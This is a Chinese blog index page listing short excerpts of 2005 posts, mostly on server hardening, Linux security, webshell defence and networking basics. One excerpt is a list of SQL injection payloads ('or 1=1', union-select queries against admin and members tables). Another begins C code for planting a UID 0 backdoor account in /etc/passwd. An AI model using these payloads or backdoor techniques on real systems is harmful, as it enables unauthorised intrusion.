- 博客(11)
- 收藏
- 关注
RSS订阅原创 DEBUG命令大全
来源不明Debug 启动 Debug,它是可用于测试和调试 MS-DOS 可执行文件的程序。 Debug [[drive:][path] filename [parameters]] 参数 [drive:][path] filename 指定要测试的可执行文件的位置和名称。 parameters 指定要测试的可执行文件所需要的任何命令行信息。 ++ 说明 使用 Debug 命令但不指定要测试的文件
2005-03-15 15:57:00
1134
原创 LINUX 基准安全清单
来源:http://coolyan.ns110.cn/系统安全记录文件 操作系统内部的记录文件是检测是否有网络入侵的重要线索。如果你的系统是直接连到Internet,你发现有很多人对你的系统做Telnet/FTP登录尝试,可以运行"#more /var/log/secure | grep refused"来检查系统所受到的攻击,以便采取相应的对策,如使用SSH来替换Telnet/rlogin等。
2005-03-15 15:47:00
793
原创 防范WEB SHELL(整理文)
来源:http://fox.he100.com/做了1年时间的虚拟主机管理员,大概对NT下的WEB SHELL的防范也有一定的了解。现在通过整理一些高手的文章来说说如何防范WEBSHELL。常见的WEBSHELL也就是ASP,PHP,PERL,这些脚本写成的。市面上比较流行的WEBSHELL也就是海阳顶端网asp木马2005、桂林老兵的ASP站长助手(不知道算不算WEBSHELL,呵呵)、蓝屏AS
2005-03-09 02:44:00
1170
原创 打造安全的2003个人Web服务器
Win2003 Server的安全性较之Win2K确实有了很大的提高,但是用Win2003 Server作为服务器是否就真的安全了?如何才能打造一个安全的个人Web服务器?下面我们简单介绍一下......一、Windows Server2003的安装 1、安装系统最少两需要个分区,分区格式都采用NTFS格式 2、在断开网络的情况安装好2003系统 3、安装IIS,仅安装必要的 IIS 组件(
2005-03-03 18:33:00
656
原创 SQL安全设置攻略
出处:NB联盟日前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQ
2005-03-03 18:25:00
689
原创 TCP/IP基础讲座
作者:代码罐头1: 1层,2层,3层? [罐头里的世界:TCP/IP基础讲座]这篇文章主要是面向自学TCP/IP的读者的.因为市面上讲解计算机网络的书虽然非常多,但是个人认为没有一本可以做到深入浅出的.都是照搬某些权威书籍中的概念,使得很多读者读了之后还是没有具体概念.希望我写的东西可以让大家有个具体概念,而不是只停留在能够背出官方的,严谨的,深奥的概念. 由于本人水平有限,如果你在文章中发
2005-03-01 09:12:00
871
原创 十项Linux安全管理技巧经验总结
作者:sFqRy 一、文件系统二、备份三、改进系统内部安全机制四、设置陷井和蜜罐五、将入侵消灭在萌芽状态六、反攻击检测七、改进登录八、使用单一登录九、掌握最新安全产品和技术十、多管齐下 由于Linux操作系统是一个开放源代码的免费操作系统,因此受到越来越多用户的欢迎。随着Linux操作系统在我国的不断普及,有关的政府部门更是将基于Linux开发具有自主版权的操作系统提高到保卫国家信息
2005-03-01 09:05:00
900
原创 VC快捷键大全
F1: 帮助Ctrl+O :OpenCtrl+P :PrintCtrl+N :NewCtrl+Shift+F2 :清除所有书签F2 :上一个书签Shift+F2 :上一个书签Alt+F2 :编辑书签Ctrl+F2 :添加/删除一个书签F12 :Goto definitionShift+F12 :Goto referenceCtrl+Num+ :Display
2005-03-01 08:05:00
625
原创 PHP注射库
or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 u
2005-03-01 07:35:00
662
原创 创建UNIX后门(初级篇,中级篇,高级篇)
作者:tiger初级篇 最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 backdoor/backdoor1.c #include main() { FILE *fd; fd=fopen("/etc/pass
2005-03-01 07:32:00
803
原创 从IIS到SQL Server数据库安全
来源: 风闪网络学院从codered到nimda等,一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了,大家还想去手工操作这些IIS漏洞么?让我们调整重心,去看看服务器常用的数据库吧。 一般网站都是基于数据库的,特别是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多注意的是操作系统的漏洞,但是对数据库和这些脚本的安全总是忽略,也没有太多注意。 从最比较普遍的
2005-03-01 07:30:00
837
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人